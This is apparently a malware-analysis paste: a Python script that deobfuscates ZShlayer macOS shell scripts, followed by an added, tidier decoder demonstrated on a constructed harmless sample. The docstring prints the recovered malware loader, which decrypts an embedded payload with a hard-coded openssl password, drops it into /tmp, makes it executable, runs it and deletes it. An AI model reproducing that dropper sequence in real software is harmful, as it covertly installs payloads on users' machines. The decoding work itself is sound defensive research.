applehelpwriter

ZShlayer Malware Decode Script

Sep 8th, 2020 (edited)
#!/usr/bin/env python3

"""
This script takes an obfuscated ZShlayer executable ("the target file") and enables its output to be read in plain text.
See: https://www.sentinelone.com/blog/coming-out-of-your-shell-from-shlayer-to-zshlayer

1. prep the target file by first saving it with linebreaks after every SEMICOLON
    e.g., search and replace ";" with ";\n"

2. change TARGET_PATH below to the path to the target file

3. change FUNC_NAME below by getting the obfuscated function name from the last two lines of the target file (see the post cited above for more details).

4. run this script in Terminal and save output to a variable, then use printf "$variable" to get the unicode to print out in ascii.
    eg., output=`./decode_zsh_script.py`
         printf "$output"

Output should be something along these lines:

   cd "$(dirname "$0")"&&fileDir="$(dirname "$(pwd -P)")"&&cd "$fileDir/Resources"
   sf1="/tmp/$RANDOM.sh"
   openssl enc -base64 -d -aes-256-cbc -nosalt -pass "pass:10560469046"<undercharge_multidimensional_Berettas > "$sf1"
   chmod 777 "$sf1"
   "$sf1"
   rm "$sf1"';'

"""

TARGET_PATH = "/Users/user/Desktop/railleries"   # adjust as required (note 2 above)
FUNC_NAME = "TWm"                                 # obfuscated function name used in your ZShlayer script (note 3 above)


def getClearForLine(l):
    """Split an assignment line of the form obscure='clear'; into (obscure, 'clear')."""
    if "=" in l:
        obscure, value = l.split("=", 1)    # split on the first "=" only, in case the value contains one
        obscure = obscure.strip()
        value = value.strip()
        if value.endswith("';"):
            value = value[:-2] + "'"        # drop the ";" terminator but keep the closing quote
        return obscure, value
    return l, l


searchArray = []
with open(TARGET_PATH, "r") as f:
    filedata = f.read()

lines = filedata.split("\n")
for l in lines:
    if FUNC_NAME not in l:                  # skip the lines that define and call the obfuscated function
        obs, clr = getClearForLine(l)
        searchArray.append([obs, clr])

# substitute every obfuscated variable name with its clear-text fragment
for ob, cl in searchArray:
    filedata = filedata.replace(ob, cl)

# keep only the lines that expand variables and join them into one string
scr = filedata.split("\n")
joined = ""
for s in scr:
    if len(s) > 0 and "$" in s:
        joined = joined + s

# remove the shell glue between fragments so only the echo payloads remain
joined = joined.replace("'}${'", "")
joined = joined.replace("$", "")
joined = joined.replace("})", "")
joined = joined.replace("({", "")
joined = joined.replace("'} {'", " ")
scrpts = joined.split("echo -e")

# each chunk starts with a backslash escape sequence; print it for printf to expand
for sc in scrpts:
    if len(sc) > 0 and "\\" in sc[0:2]:
        s = sc[1:]
        print(s)
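As an added example (not the paste's own script, and not code from the SentinelOne post it cites), the same substitution idea as a self-contained decoder run on a constructed sample. It assumes a simplified ZShlayer-like layout: fragments assigned as `name='...';`, referenced as `${name}`, and emitted through `echo -e`; real samples may wrap references differently (the script's own `({` / `})` replacements hint at that), so `ASSIGN_RE`, `REF_RE`, `SAMPLE` and the `decode` helpers are assumptions for illustration. Unlike the script above it expands the `\u` escapes itself with Python's `unicode_escape` codec, so the `printf` step is not needed, it resolves nested references, and it refuses cyclic reference chains instead of looping.

```python
#!/usr/bin/env python3
# Added example, not the original paste's script.  Decodes a constructed,
# ZShlayer-style obfuscated zsh snippet by resolving variable fragments and
# expanding the `echo -e` escapes in Python (no printf step required).
import re

# Assumed layout: fragments are assigned as name='value'; and referenced as ${name}.
ASSIGN_RE = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)='([^']*)'\s*;?\s*$")
REF_RE = re.compile(r"\$\{([A-Za-z_][A-Za-z0-9_]*)\}")

# Constructed sample: each variable holds \uXXXX-encoded characters, one holds
# a nested reference, and the function TWm (the "obfuscated function name" that
# step 3 of the paste refers to) echoes the concatenation.
SAMPLE = (
    "qx='\\u0063\\u0064 \\u0022';"                 # cd "
    "zr='\\u002f\\u0074\\u006d\\u0070\\u0022';"    # /tmp"
    "mk='\\u000a';"                                # newline
    "wv='${qx}${zr}';"                             # nested reference
    "TWm(){ echo -e \"${wv}${mk}\"; };"
    "TWm"
)


def split_statements(text):
    """Step 1 of the paste, done in code: one statement per line."""
    return text.replace(";", ";\n").splitlines()


def build_table(lines, func_name):
    """Map obfuscated variable names to their raw (still escaped) fragments."""
    table = {}
    for line in lines:
        if func_name in line:        # skip the function definition and its call
            continue
        m = ASSIGN_RE.match(line)
        if m:
            table[m.group(1)] = m.group(2)
    return table


def resolve(fragment, table, depth=0):
    """Expand ${name} references recursively; refuse runaway chains."""
    if depth > 50:
        raise ValueError("reference chain too deep; possible cycle")

    def expand(m):
        name = m.group(1)
        if name not in table:
            return m.group(0)        # leave unknown references visible for the analyst
        return resolve(table[name], table, depth + 1)

    return REF_RE.sub(expand, fragment)


def unescape_echo(payload):
    """Interpret \\uXXXX, \\xHH, \\n and friends the way `echo -e` would."""
    return payload.encode("latin-1", "backslashreplace").decode("unicode_escape")


def extract_echo_payloads(lines):
    """Return the quoted argument of every `echo -e` statement."""
    payloads = []
    for line in lines:
        if "echo -e" not in line:
            continue
        arg = line.split("echo -e", 1)[1].strip().rstrip(";").strip()
        payloads.append(arg.strip('"'))
    return payloads


def decode(script_text, func_name):
    """Full pipeline: split, build the table, resolve each echo payload, unescape."""
    lines = split_statements(script_text)
    table = build_table(lines, func_name)
    return "".join(
        unescape_echo(resolve(p, table)) for p in extract_echo_payloads(lines)
    )


if __name__ == "__main__":
    print(decode(SAMPLE, "TWm"), end="")
```

Run it as-is and it prints `cd "/tmp"` for the constructed sample; to use it on a real file, read the file into `script_text` and pass the function name you recovered from the last two lines of the target, exactly as in step 3 above. Keeping the intermediate table (`build_table`) around is useful when a sample resolves to something unexpected, since you can inspect which fragment introduced the odd bytes.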